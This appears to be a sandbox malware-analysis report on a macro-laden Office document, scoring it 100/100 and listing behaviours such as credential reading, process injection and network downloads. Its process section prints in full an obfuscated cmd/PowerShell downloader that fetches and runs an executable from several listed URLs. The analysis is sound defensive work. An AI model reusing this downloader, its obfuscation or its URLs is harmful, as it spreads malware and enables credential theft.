VTI Score
100 / 100
|
|
VTI Database Version | 2.6 |
VTI Rule Match Count | 24 |
VTI Rule Type | Documents |
Browser |
|
|
Read data related to browsing history
|
|
|
Read the browsing history for "Microsoft Internet Explorer".
|
||
File System |
|
|
Handle with malicious files
|
|
|
File "c:\users\public\3292.exe" is a known malicious file.
|
||
Information Stealing |
|
|
Read browser data
|
|
|
Possibly trying to readout browser credentials.
|
||
Injection |
|
|
Write into memory of a process running from a created or modified executable
|
|
|
"c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe" modifies memory of "c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe"
|
||
Modify control flow of a process running from a created or modified executable
|
|
|
"c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe" alters context of "c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe"
|
||
Network |
|
|
Download data
|
|
|
URL "www.indpts.com/UHSD/".
|
||
URL "173.201.20.6".
|
||
URL "159.203.94.198".
|
||
Perform DNS request
|
|
|
Resolve host name "www.indpts.com".
|
||
Connect to remote host
|
|
|
Outgoing TCP connection to host "108.163.227.35:80".
|
||
Connect to HTTP server
|
|
|
URL "173.201.20.6".
|
||
URL "159.203.94.198".
|
||
URL "www.indpts.com/UHSD/".
|
||
PE |
|
|
Execute dropped PE file
|
|
|
Execute dropped file "c:\users\public\3292.exe".
|
||
Drop PE file
|
|
|
Drop file "c:\users\public\3292.exe".
|
||
Process |
|
|
Create process
|
|
|
Create process "CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) ".
|
||
Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
|
||
Create process "C:\Users\Public\3292.exe".
|
||
Create process "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe".
|
||
Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp"".
|
||
Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp"".
|
||
Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp"".
|
||
Create system object
|
|
|
Create mutex with name "Global\.net clr networking".
|
||
Create mutex with name "Global\I705BA84C".
|
||
Create mutex with name "Global\M705BA84C".
|
||
VBA Macro |
|
|
Execute application
|
|
|
VBA.Shell$ QiiPPcnDM, 0
|
||
Execute macro on specific worksheet event
|
|
|
Execute macro on "Activate Workbook" event.
|
||
- | Anti Analysis | |
- | Device | |
- | OS | |
- | Hide Tracks | |
- | Kernel | |
- | Masquerade | |
- | Persistence | |
- | User | |
- | YARA |